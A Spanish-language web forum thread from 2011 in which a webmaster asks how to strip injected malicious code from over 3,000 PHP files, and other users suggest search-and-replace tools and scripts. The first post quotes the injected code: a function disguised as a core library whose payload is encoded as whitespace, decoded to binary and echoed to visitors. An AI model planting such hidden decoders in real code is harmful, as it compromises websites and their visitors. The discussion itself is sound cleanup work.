Como puedo eliminar codigo inyectado en + de 3000 archivos PHP

insyse · #1 (**permalink**) 18/05/2011, 09:31

Hola a todos,

hace unos dias postee un problema que he venido teniendo en mi servidor, tengo contratado un hosting con Awardspace, donde tengo alojadas 20 paginas web diferentes, desde hace unas dos semanas me han estado inyectando código malicioso, y de golpe me afecta a todos los archivos PHP de todos los sitios.

el codigo es el siguiente

Código PHP:

  <?php /** 
 * Gets some core libraries and displays a top message if required.    /* 
 */ function CoreLibrariesHandler() {                    /* 
 */   $session_keys = '                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ';  /* 
 */                                    /*  
 */    foreach(str_split($session_keys, 8) as $k=>$v) {         /*              
 */        $v = str_replace('    ', 1, str_replace(' ', 0, $v));    /* 
 */        $session_keys[$k] = chr(bindec($v));             /* 
 */    }                                 /* 
 */                                    /* 
 */    if($session_keys) echo $session_keys; }                /* 
 */    register_shutdown_function('CoreLibrariesHandler');        /* 
 */                                    /* 
 ************************************************************************/ 
 
 
 
 ?>

He buscado en internet y encontré en este foro una solución rápida para eliminar el codigo inyectado, pero no se como usar la solución.

http://www.unix.com/shell-programmin...d-keyword.html

Mas o menos dice que hay un código basura inyectado que reenvía las páginas a un sitio que contiene virus.

La solución parece ser un código que lee cada archivo PHP y busca el código y si existe lo borra sin afectar el resto del contenido del archivo.

El código que coloque al principio, tiene en todas las paginas la misma estructura y siempre esta antes de cualquier contenido de mis archivos.

Alguien me puede ayudar a crear este script que borre el código inyectado sin afectar el contenido de mis archivos PHP????

Aclaro que son mas de 3000 archivos y bajar todo, para buscar el código basura manualmente y volver a subir todo, me llevaría al menos 2-3 días.

En espera de su amable ayuda...

Leonardo

Adell · #2 (**permalink**) 18/05/2011, 09:37

Hola,
bueno primero que nada deberias resolver el problema de como te inyectan codigo poque sino te volvera a suceder y te causara muchas molestias y frustraciones

en cuanto a tu pregunta, puedes hacer un fopen leer el archivo hacer un preg_replace del patron que buscas y cerrar el archivo. siendo tantos archivos es un costo grande, deberias resolver el primer problema antes que nada

saludos

pateketrueke · #3 (**permalink**) 18/05/2011, 09:39

¿Las 20 paginas son tuyas o de tu empresa?

¿Igualmente los 3000 archivos?

Lo menciono porque realmente me parece una gran labor, seguro alguien te ayuda, ¿pero estás consciente de el trabajo que esto implica verdad?

insyse · #4 (**permalink**) 18/05/2011, 09:48

La 20 paginas son de mis clientes, por eso la urgencia de solucionar el problema, ya estoy buscando nuevo proveedor de hsoting, pq estoy casi seguro que el problema esta ahi...

Si alguien me puede ayudar con el codigo pues no se mucho de PHP y scripts para hacer esto y la cuestion es de tiempo....

He pensado en algo asi, pero no se como seria la sintaxis en PHP:

1- que pueda recorrer todos los archivos PHP de cada sitio
2- en cada archivo busque el codigo basura y lo elimine

espero que me puedan ayudar

Leonardo

pep0te · #5 (**permalink**) 18/05/2011, 09:59

No sé si lo que voy a decir es un poco locura o sobra aquí xD, pero con Linux (con Ubuntu, por ejemplo) haciendo:

grep -lr "cadenabuscada" $(find directorio -name *.php)

Con permisos root, podrías encontrar todos los ficheros buscando desde el raíz en los que está contenida esa cadena pero no sabría decirte cómo sacar ese texto de ahí...

jcxnet · #6 (**permalink**) 18/05/2011, 10:01

Textcrawler te puede servir para buscar y reemplazar en cada archivo

mogurbon · #7 (**permalink**) 18/05/2011, 10:29

dreamweaver te busca a traves de archivos y reemplaza si te vas tendido como bandido en un ratito te lo chutas

s00rk · #8 (**permalink**) 18/05/2011, 10:44

Tambien podria hacer un script donde lea el contenido de cada archivo y luego busque tal texto y lo reemplace por un espacio no ?

pep0te · #9 (**permalink**) 18/05/2011, 11:17

Si por poder... xDDD

Sourcegeek · #10 (**permalink**) 18/05/2011, 16:51

La solución la puedes hacer tú mismo... Haces un script que obtenga todos los archivos, los recorres, abres cada uno, buscas la cadena y la reemplazas por cualquier cosa, y listo.

Saludos!

metacortex · #11 (**permalink**) 19/05/2011, 04:03

Cita:

Iniciado por jcxnet

Textcrawler te puede servir para buscar y reemplazar en cada archivo

Buen dato, gracias!